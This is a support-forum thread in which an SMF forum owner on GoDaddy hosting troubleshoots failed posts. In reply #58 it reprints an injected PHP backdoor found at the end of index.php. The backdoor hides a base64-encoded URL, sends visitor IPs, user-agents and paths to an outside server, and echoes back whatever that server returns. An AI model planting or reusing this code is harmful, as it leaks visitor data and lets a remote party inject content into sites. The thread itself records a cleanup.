Advertisement:

Author Topic: Can't post anything: "The connection was reset"  (Read 21860 times)

Offline Illori

  • Project Manager
  • SMF Master
  • *
  • Posts: 47,877
Re: Can't post anything: "The connection was reset"
« Reply #40 on: July 29, 2014, 10:05:33 AM »
pick a host from here http://www.simplemachines.org/community/index.php?board=155.0 and they will move all your sites files etc for you.

Offline backend

  • Jr. Member
  • **
  • Posts: 172
Re: Can't post anything: "The connection was reset"
« Reply #41 on: August 02, 2014, 01:11:33 AM »
Ok so here is something strange.

I found a loophole that finally allows me to post to my forum : using the iPhone app 'Tapatalk' I was shocked to find out that I can post with no problem.

Meanwhile , I still can't post using a browser.

Of course, this is not the solution to my problem, but maybe it can help us find a solution. In other words, why am I able to post from an iPhone app and not from a browser? How can we use that to solve the problem at hand, if at all?

Offline backend

  • Jr. Member
  • **
  • Posts: 172
Re: Can't post anything: "The connection was reset"
« Reply #42 on: August 06, 2014, 01:43:23 PM »
Ok so here is something strange.

I found a loophole that finally allows me to post to my forum : using the iPhone app 'Tapatalk' I was shocked to find out that I can post with no problem.

Meanwhile , I still can't post using a browser.

Of course, this is not the solution to my problem, but maybe it can help us find a solution. In other words, why am I able to post from an iPhone app and not from a browser? How can we use that to solve the problem at hand, if at all?

So, anyone got a clue on this please?

Offline backend

  • Jr. Member
  • **
  • Posts: 172
Re: Can't post anything: "The connection was reset"
« Reply #43 on: August 13, 2014, 09:59:25 AM »
Ok, so after being patient for some +3 weeks, they have finally resolved the issue. But I am not really sure what the issue was and their email below is very vague. I did reply asking them to explain what the issue was and I am still waiting:

The issue with your Authorize.net transactions on your two secondary domains has been addressed and resolved. If this issue re-occurs, or you experience any other problems please let us know and we would be happy to assist you further. We appreciate your patience and understanding in this matter.

First of all, what a hell is Authorize.net? I have never used it on my website and have no idea what it is. Second of all, what do they mean 'two domain names'? Sure I have a few domain names hosted with them but what does that have to do with this issue?

It is as if they are talking about a completely different issue or client.

I hope to call them later this week to clarify what the issue was.

Offline backend

  • Jr. Member
  • **
  • Posts: 172
Re: Can't post anything: "The connection was reset"
« Reply #44 on: August 13, 2014, 10:18:17 AM »
Damn it, I think I spoke too soon! After working for almost two days with no problem, it has stopped working again now, damn it!  Same issue again....

Hope it is temporary...

« Last Edit: August 13, 2014, 10:35:05 AM by backend »

Offline backend

  • Jr. Member
  • **
  • Posts: 172
Re: Can't post anything: "The connection was reset"
« Reply #45 on: August 13, 2014, 11:31:00 AM »

kat

  • Guest
Re: Can't post anything: "The connection was reset"
« Reply #46 on: August 14, 2014, 04:11:49 PM »
How's this going, now?

Offline backend

  • Jr. Member
  • **
  • Posts: 172
Re: Can't post anything: "The connection was reset"
« Reply #47 on: August 14, 2014, 04:51:43 PM »
How's this going, now?

Hi there, not sure if you read my last 3 posts or so, they fixed the problem, only for it to come back again about 48 hours later.

Now I am in touch with them again.

Will keep you guys updated.

kat

  • Guest
Re: Can't post anything: "The connection was reset"
« Reply #48 on: August 14, 2014, 04:55:16 PM »
Might be best to bite the bullet and give godaddy the flick...

Offline backend

  • Jr. Member
  • **
  • Posts: 172
Re: Can't post anything: "The connection was reset"
« Reply #49 on: August 27, 2014, 09:33:06 PM »
It has now been a 40 days and still have this issue.

Spoke to GoDaddy on Sunday and the rep said it is now with their 4th level support.


Offline CoreISP

  • Server Admin
  • Server Team
  • SMF Super Hero
  • *
  • Posts: 16,931
  • Gender: Male
  • CoreISP.net
    • liroyvh on LinkedIn
    • @liroyvh on Twitter
    • CoreISP Corporation :: WebHosting, Dedicated Servers, and more!
Re: Can't post anything: "The connection was reset"
« Reply #50 on: August 27, 2014, 09:46:47 PM »
40 days and you still haven't jumped ship?
GoDaddy is lucky to have such a loyal client, heh.
Considering they don't seem to be able to resolve the issue, I'd start considering my options.
- CoreISP.net Corporation -
  WebHosting, Colocation, Domain Registration & Network Services
- DedicatedBox.us Servers -
  Low priced Servers in a high-quality Network, the place for all your (advanced) server needs.
  We specialize in hosting big boards. Contact us!

((U + C + I)x(10 − S)) / 20xAx1 / (1 − sin(F / 10))
President/CEO of Simple Machines - Server Manager
Please do not PM for support - anything else is usually OK.

Offline ARG01

  • SMF Hero
  • ******
  • Posts: 4,583
  • DzinerStudio
    • All Web Now
Re: Can't post anything: "The connection was reset"
« Reply #51 on: August 27, 2014, 10:17:07 PM »
40 days and you still haven't jumped ship?
GoDaddy is lucky to have such a loyal client, heh.
Considering they don't seem to be able to resolve the issue, I'd start considering my options.

Couldn't have said it better myself. I was with GD for about a year in the very beginning and had nothing but issues when it came to SMF and WP. Moved eight years ago and have not had one issue since.
All Web Now
Old 2.0 Samples
No, I will not offer free downloads to Premium DzinerStuido themes. Please stop asking.

Offline backend

  • Jr. Member
  • **
  • Posts: 172
Re: Can't post anything: "The connection was reset"
« Reply #52 on: August 27, 2014, 11:35:10 PM »
Guys I have been with Godaddy for almost 14 years (SMF since 2005) and have never had any real problems. This is the first one and unfortunately it has been my worst ever.


Offline Ninja ZX-10RR

  • SMF Hero
  • ******
  • Posts: 2,133
  • Gender: Male
  • Sniper Legends
    • Flavio93Zena on Facebook
    • Virtual Interactive Games Entertainment Forum
Re: Can't post anything: "The connection was reset"
« Reply #53 on: August 27, 2014, 11:46:07 PM »
Guys I have been with Godaddy for almost 14 years (SMF since 2005) and have never had any real problems. This is the first one and unfortunately it has been my worst ever.


2014-2005=9, not 14 actually... Anyway I think you have been really lucky if you check the whole forum you will find lots of topics made by angry people experiencing troubles because of GoDaddy's servers...
Quote from: BeastMode topic=525177.msg3720020#msg3720020
It's so powerful that on this post and even in the two PMs you sent me,you still answered my question very quickly and you're apologizing for the delay. You're the #1 support I've probably ever encountered man, so much respect for that. Thank you, and get better soon.

I'll keep this in my siggy for a while just to remind me that someone appreciated what I did while others didn't.
♥ Jess ♥

STOP EDITING MY PROFILE

Offline Arantor

  • Resident Overthinker
  • SMF Friend
  • SMF Legend
  • *
  • Posts: 67,899
    • Arantor on GitHub
Re: Can't post anything: "The connection was reset"
« Reply #54 on: August 27, 2014, 11:47:54 PM »
One can be a user on GoDaddy's servers without SMF, you know ;)
To assume is to hope that those who came before had the presence of mind and capacity to implement the dreams of those who would come after.

You either die a hero or live long enough to see yourself become the villain. It seems you have chosen which, and now I must do the same.

Offline backend

  • Jr. Member
  • **
  • Posts: 172
Re: Can't post anything: "The connection was reset"
« Reply #55 on: August 27, 2014, 11:50:58 PM »
As a website, been with GD for about 14 years.

As for SMF, I have had it with GD for about 9 years now.

Offline Ninja ZX-10RR

  • SMF Hero
  • ******
  • Posts: 2,133
  • Gender: Male
  • Sniper Legends
    • Flavio93Zena on Facebook
    • Virtual Interactive Games Entertainment Forum
Re: Can't post anything: "The connection was reset"
« Reply #56 on: August 27, 2014, 11:56:36 PM »
And this makes me think I should go to bed, lol on that one :P

Anyway it doesn't change very much, you have been lucky ;)
Quote from: BeastMode topic=525177.msg3720020#msg3720020
It's so powerful that on this post and even in the two PMs you sent me,you still answered my question very quickly and you're apologizing for the delay. You're the #1 support I've probably ever encountered man, so much respect for that. Thank you, and get better soon.

I'll keep this in my siggy for a while just to remind me that someone appreciated what I did while others didn't.
♥ Jess ♥

STOP EDITING MY PROFILE

kat

  • Guest
Re: Can't post anything: "The connection was reset"
« Reply #57 on: August 28, 2014, 05:54:01 AM »
Don't hold your breath... If you search for posts involving Godaddy, here, you'll see why... :(

Offline backend

  • Jr. Member
  • **
  • Posts: 172
Re: Can't post anything: "The connection was reset"
« Reply #58 on: August 28, 2014, 09:32:41 AM »
Guys, finally some good news!  :)

Got a reply back from GoDaddy telling me that some 23 pages on my website (not just SMF) were infected with some code. But they only gave me part of the code. I did some research and found the following code which others have complained about as well:

Quote
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>



I looked at my index.php and found it at the very bottom of the page.

When I deleted that part, the forums were back up and running like magic! I couldn't believe it, what a relief!!!!!!!!!!!

Now I just have to remove it from the other pages.

Offline backend

  • Jr. Member
  • **
  • Posts: 172
Re: Can't post anything: "The connection was reset"
« Reply #59 on: August 28, 2014, 09:33:54 AM »
Now here is my question: how can I make sure this doesn't happen again? is this happening through an SMF mod/theme or even WordPress Plugin? Where do you even start?

I have already changed my forum/cPanel/FTP passwords. What else can I do?